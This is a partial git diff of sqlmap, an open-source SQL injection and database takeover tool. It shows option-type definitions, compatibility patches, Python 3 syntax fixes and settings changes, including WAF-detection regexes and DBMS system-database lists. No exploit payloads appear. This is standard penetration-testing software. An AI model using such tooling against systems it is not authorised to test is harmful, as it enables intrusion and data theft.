"googlePage": "integer",
|
||||||
}
|
"identifyWaf": "boolean",
|
||||||
|
"listTampers": "boolean",
|
||||||
|
"mobile": "boolean",
|
||||||
|
"offline": "boolean",
|
||||||
|
"purge": "boolean",
|
||||||
|
"skipWaf": "boolean",
|
||||||
|
"smart": "boolean",
|
||||||
|
"tmpDir": "string",
|
||||||
|
"webRoot": "string",
|
||||||
|
"wizard": "boolean",
|
||||||
|
"verbose": "integer",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Hidden": {
|
||||||
|
"dummy": "boolean",
|
||||||
|
"disablePrecon": "boolean",
|
||||||
|
"profile": "boolean",
|
||||||
|
"forceDns": "boolean",
|
||||||
|
"murphyRate": "integer",
|
||||||
|
"smokeTest": "boolean",
|
||||||
|
"liveTest": "boolean",
|
||||||
|
"stopFail": "boolean",
|
||||||
|
"runCase": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"API": {
|
||||||
|
"api": "boolean",
|
||||||
|
"taskid": "string",
|
||||||
|
"database": "string",
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
26
lib/core/patch.py
Normal file
26
lib/core/patch.py
Normal file
@@ -0,0 +1,26 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'LICENSE' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import httplib
|
||||||
|
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
|
||||||
|
def dirtyPatches():
|
||||||
|
"""
|
||||||
|
Place for "dirty" Python related patches
|
||||||
|
"""
|
||||||
|
|
||||||
|
# accept overly long result lines (e.g. SQLi results in HTTP header responses)
|
||||||
|
httplib._MAXLINE = 1 * 1024 * 1024
|
||||||
|
|
||||||
|
# add support for inet_pton() on Windows OS
|
||||||
|
if IS_WIN:
|
||||||
|
from thirdparty.wininetpton import win_inet_pton
|
||||||
|
|
||||||
|
# Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440
|
||||||
|
codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)
|
||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -9,7 +9,7 @@ import codecs
|
|||||||
import os
|
import os
|
||||||
import cProfile
|
import cProfile
|
||||||
|
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getSafeExString
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
@@ -20,13 +20,13 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
__import__("gobject")
|
||||||
from thirdparty.gprof2dot import gprof2dot
|
from thirdparty.gprof2dot import gprof2dot
|
||||||
from thirdparty.xdot import xdot
|
from thirdparty.xdot import xdot
|
||||||
import gobject
|
|
||||||
import gtk
|
import gtk
|
||||||
import pydot
|
import pydot
|
||||||
except ImportError, e:
|
except ImportError as ex:
|
||||||
errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING)
|
errMsg = "profiling requires third-party libraries ('%s') " % getSafeExString(ex)
|
||||||
errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')"
|
errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')"
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
@@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
if os.path.exists(imageOutputFile):
|
if os.path.exists(imageOutputFile):
|
||||||
os.remove(imageOutputFile)
|
os.remove(imageOutputFile)
|
||||||
|
|
||||||
infoMsg = "profiling the execution into file %s" % profileOutputFile
|
infoMsg = "profiling the execution into file '%s'" % profileOutputFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Start sqlmap main function and generate a raw profile file
|
# Start sqlmap main function and generate a raw profile file
|
||||||
@@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
if isinstance(pydotGraph, list):
|
if isinstance(pydotGraph, list):
|
||||||
pydotGraph = pydotGraph[0]
|
pydotGraph = pydotGraph[0]
|
||||||
|
|
||||||
pydotGraph.write_png(imageOutputFile)
|
try:
|
||||||
|
pydotGraph.write_png(imageOutputFile)
|
||||||
|
except OSError:
|
||||||
|
errMsg = "profiling requires graphviz installed "
|
||||||
|
errMsg += "(Hint: 'sudo apt-get install graphviz')"
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
infoMsg = "displaying interactive graph with xdot library"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
infoMsg = "displaying interactive graph with xdot library"
|
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
|
||||||
logger.info(infoMsg)
|
# http://code.google.com/p/jrfonseca/wiki/XDot
|
||||||
|
win = xdot.DotWindow()
|
||||||
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
|
win.connect('destroy', gtk.main_quit)
|
||||||
# http://code.google.com/p/jrfonseca/wiki/XDot
|
win.set_filter("dot")
|
||||||
win = xdot.DotWindow()
|
win.open_file(dotOutputFile)
|
||||||
win.connect('destroy', gtk.main_quit)
|
gtk.main()
|
||||||
win.set_filter("dot")
|
|
||||||
win.open_file(dotOutputFile)
|
|
||||||
gtk.main()
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -14,11 +14,11 @@ _readline = None
|
|||||||
try:
|
try:
|
||||||
from readline import *
|
from readline import *
|
||||||
import readline as _readline
|
import readline as _readline
|
||||||
except ImportError:
|
except:
|
||||||
try:
|
try:
|
||||||
from pyreadline import *
|
from pyreadline import *
|
||||||
import pyreadline as _readline
|
import pyreadline as _readline
|
||||||
except ImportError:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
if IS_WIN and _readline:
|
if IS_WIN and _readline:
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -27,7 +27,7 @@ class Replication(object):
|
|||||||
self.connection = sqlite3.connect(dbpath)
|
self.connection = sqlite3.connect(dbpath)
|
||||||
self.connection.isolation_level = None
|
self.connection.isolation_level = None
|
||||||
self.cursor = self.connection.cursor()
|
self.cursor = self.connection.cursor()
|
||||||
except sqlite3.OperationalError, ex:
|
except sqlite3.OperationalError as ex:
|
||||||
errMsg = "error occurred while opening a replication "
|
errMsg = "error occurred while opening a replication "
|
||||||
errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex))
|
errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex))
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
@@ -63,7 +63,7 @@ class Replication(object):
|
|||||||
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
|
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
|
||||||
else:
|
else:
|
||||||
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
|
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
|
||||||
except Exception, ex:
|
except Exception as ex:
|
||||||
errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
||||||
errMsg += "located at '%s'" % self.parent.dbpath
|
errMsg += "located at '%s'" % self.parent.dbpath
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
@@ -82,7 +82,7 @@ class Replication(object):
|
|||||||
def execute(self, sql, parameters=[]):
|
def execute(self, sql, parameters=[]):
|
||||||
try:
|
try:
|
||||||
self.parent.cursor.execute(sql, parameters)
|
self.parent.cursor.execute(sql, parameters)
|
||||||
except sqlite3.OperationalError, ex:
|
except sqlite3.OperationalError as ex:
|
||||||
errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
||||||
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
|
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
|
||||||
errMsg += "it's not used by some other program"
|
errMsg += "it's not used by some other program"
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'LICENSE' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
@@ -19,16 +19,18 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
|||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.1.12.0"
|
VERSION = "1.3.2.0"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||||
SITE = "http://sqlmap.org"
|
SITE = "http://sqlmap.org"
|
||||||
|
DEFAULT_USER_AGENT = "%s (%s)" % (VERSION_STRING, SITE)
|
||||||
DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
|
DEV_EMAIL_ADDRESS = "dev@sqlmap.org"
|
||||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git"
|
||||||
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||||
|
ZIPBALL_PAGE = "https://github.com/sqlmapproject/sqlmap/zipball/master"
|
||||||
|
|
||||||
# colorful banner
|
# colorful banner
|
||||||
BANNER = """\033[01;33m\
|
BANNER = """\033[01;33m\
|
||||||
@@ -37,17 +39,17 @@ BANNER = """\033[01;33m\
|
|||||||
___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||||
|_ -| . [.] | .'| . |
|
|_ -| . [.] | .'| . |
|
||||||
|___|_ [.]_|_|_|__,| _|
|
|___|_ [.]_|_|_|__,| _|
|
||||||
|_|V |_| \033[0m\033[4;37m%s\033[0m\n
|
|_|V... |_| \033[0m\033[4;37m%s\033[0m\n
|
||||||
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
|
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
|
||||||
|
|
||||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||||
DIFF_TOLERANCE = 0.05
|
DIFF_TOLERANCE = 0.05
|
||||||
CONSTANT_RATIO = 0.9
|
CONSTANT_RATIO = 0.9
|
||||||
|
|
||||||
# Ratio used in heuristic check for WAF/IPS/IDS protected targets
|
# Ratio used in heuristic check for WAF/IPS protected targets
|
||||||
IDS_WAF_CHECK_RATIO = 0.5
|
IDS_WAF_CHECK_RATIO = 0.5
|
||||||
|
|
||||||
# Timeout used in heuristic check for WAF/IPS/IDS protected targets
|
# Timeout used in heuristic check for WAF/IPS protected targets
|
||||||
IDS_WAF_CHECK_TIMEOUT = 10
|
IDS_WAF_CHECK_TIMEOUT = 10
|
||||||
|
|
||||||
# Lower and upper values for match ratio in case of stable page
|
# Lower and upper values for match ratio in case of stable page
|
||||||
@@ -70,6 +72,7 @@ RANDOM_INTEGER_MARKER = "[RANDINT]"
|
|||||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||||
SLEEP_TIME_MARKER = "[SLEEPTIME]"
|
SLEEP_TIME_MARKER = "[SLEEPTIME]"
|
||||||
INFERENCE_MARKER = "[INFERENCE]"
|
INFERENCE_MARKER = "[INFERENCE]"
|
||||||
|
SINGLE_QUOTE_MARKER = "[SINGLE_QUOTE]"
|
||||||
|
|
||||||
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||||
CHAR_INFERENCE_MARK = "%c"
|
CHAR_INFERENCE_MARK = "%c"
|
||||||
@@ -82,10 +85,13 @@ SELECT_FROM_TABLE_REGEX = r"\bSELECT\b.+?\bFROM\s+(?P<result>([\w.]|`[^`<>]+`)+)
|
|||||||
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic permission messages
|
# Regular expression used for recognition of generic permission messages
|
||||||
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
PERMISSION_DENIED_REGEX = r"(?P<result>(command|permission|access)\s*(was|is)?\s*denied)"
|
||||||
|
|
||||||
|
# Regular expression used in recognition of generic protection mechanisms
|
||||||
|
GENERIC_PROTECTION_REGEX = r"(?i)\b(rejected|blocked|protection|incident|denied|detected|dangerous|firewall)\b"
|
||||||
|
|
||||||
# Regular expression used for recognition of generic maximum connection messages
|
# Regular expression used for recognition of generic maximum connection messages
|
||||||
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
MAX_CONNECTIONS_REGEX = r"\bmax.+?\bconnection"
|
||||||
|
|
||||||
# Maximum consecutive connection errors before asking the user if he wants to continue
|
# Maximum consecutive connection errors before asking the user if he wants to continue
|
||||||
MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
|
MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
|
||||||
@@ -93,6 +99,9 @@ MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
|
|||||||
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
|
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
|
||||||
PRECONNECT_CANDIDATE_TIMEOUT = 10
|
PRECONNECT_CANDIDATE_TIMEOUT = 10
|
||||||
|
|
||||||
|
# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support)
|
||||||
|
PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",)
|
||||||
|
|
||||||
# Maximum sleep time in "Murphy" (testing) mode
|
# Maximum sleep time in "Murphy" (testing) mode
|
||||||
MAX_MURPHY_SLEEP_TIME = 3
|
MAX_MURPHY_SLEEP_TIME = 3
|
||||||
|
|
||||||
@@ -100,7 +109,7 @@ MAX_MURPHY_SLEEP_TIME = 3
|
|||||||
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
||||||
|
|
||||||
# Regular expression used for extracting results from DuckDuckGo search
|
# Regular expression used for extracting results from DuckDuckGo search
|
||||||
DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
|
DUCKDUCKGO_REGEX = r'<a class="result__url" href="(htt[^"]+)'
|
||||||
|
|
||||||
# Regular expression used for extracting results from Bing search
|
# Regular expression used for extracting results from Bing search
|
||||||
BING_REGEX = r'<h2><a href="([^"]+)" h='
|
BING_REGEX = r'<h2><a href="([^"]+)" h='
|
||||||
@@ -157,6 +166,9 @@ MAX_TECHNIQUES_PER_VALUE = 2
|
|||||||
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
|
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
|
||||||
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
||||||
|
|
||||||
|
# Maximum size of cache used in @cachedmethod decorator
|
||||||
|
MAX_CACHE_ITEMS = 256
|
||||||
|
|
||||||
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
||||||
METADB_SUFFIX = "_masterdb"
|
METADB_SUFFIX = "_masterdb"
|
||||||
|
|
||||||
@@ -166,6 +178,9 @@ PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
|
|||||||
# Minimum time response set needed for time-comparison based on standard deviation
|
# Minimum time response set needed for time-comparison based on standard deviation
|
||||||
MIN_TIME_RESPONSES = 30
|
MIN_TIME_RESPONSES = 30
|
||||||
|
|
||||||
|
# Maximum time response set used during time-comparison based on standard deviation
|
||||||
|
MAX_TIME_RESPONSES = 200
|
||||||
|
|
||||||
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
|
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
|
||||||
MIN_UNION_RESPONSES = 5
|
MIN_UNION_RESPONSES = 5
|
||||||
|
|
||||||
@@ -202,6 +217,11 @@ DUMMY_USER_PREFIX = "__dummy__"
|
|||||||
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
|
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
|
||||||
DEFAULT_PAGE_ENCODING = "iso-8859-1"
|
DEFAULT_PAGE_ENCODING = "iso-8859-1"
|
||||||
|
|
||||||
|
try:
|
||||||
|
unicode(DEFAULT_PAGE_ENCODING, DEFAULT_PAGE_ENCODING)
|
||||||
|
except LookupError:
|
||||||
|
DEFAULT_PAGE_ENCODING = "utf8"
|
||||||
|
|
||||||
# URL used in dummy runs
|
# URL used in dummy runs
|
||||||
DUMMY_URL = "http://foo/bar?id=1"
|
DUMMY_URL = "http://foo/bar?id=1"
|
||||||
|
|
||||||
@@ -214,9 +234,9 @@ PYVERSION = sys.version.split()[0]
|
|||||||
|
|
||||||
# DBMS system databases
|
# DBMS system databases
|
||||||
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
||||||
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema")
|
MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema", "sys")
|
||||||
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
|
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent")
|
||||||
ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/
|
ORACLE_SYSTEM_DBS = ('ANONYMOUS', 'APEX_030200', 'APEX_PUBLIC_USER', 'APPQOSSYS', 'BI', 'CTXSYS', 'DBSNMP', 'DIP', 'EXFSYS', 'FLOWS_%', 'FLOWS_FILES', 'HR', 'IX', 'LBACSYS', 'MDDATA', 'MDSYS', 'MGMT_VIEW', 'OC', 'OE', 'OLAPSYS', 'ORACLE_OCM', 'ORDDATA', 'ORDPLUGINS', 'ORDSYS', 'OUTLN', 'OWBSYS', 'PM', 'SCOTT', 'SH', 'SI_INFORMTN_SCHEMA', 'SPATIAL_CSW_ADMIN_USR', 'SPATIAL_WFS_ADMIN_USR', 'SYS', 'SYSMAN', 'SYSTEM', 'WKPROXY', 'WKSYS', 'WK_TEST', 'WMSYS', 'XDB', 'XS$NULL')
|
||||||
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
|
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
|
||||||
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
|
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2")
|
||||||
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
|
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
|
||||||
@@ -224,6 +244,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
|
|||||||
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
|
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
|
||||||
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
|
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
|
||||||
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
|
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
|
||||||
|
H2_SYSTEM_DBS = ("INFORMATION_SCHEMA")
|
||||||
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
|
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
|
||||||
|
|
||||||
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
|
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
|
||||||
@@ -237,20 +258,21 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
|
|||||||
SYBASE_ALIASES = ("sybase", "sybase sql server")
|
SYBASE_ALIASES = ("sybase", "sybase sql server")
|
||||||
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
|
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
|
||||||
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
|
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
|
||||||
|
H2_ALIASES = ("h2",)
|
||||||
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
|
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
|
||||||
|
|
||||||
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
||||||
|
|
||||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
|
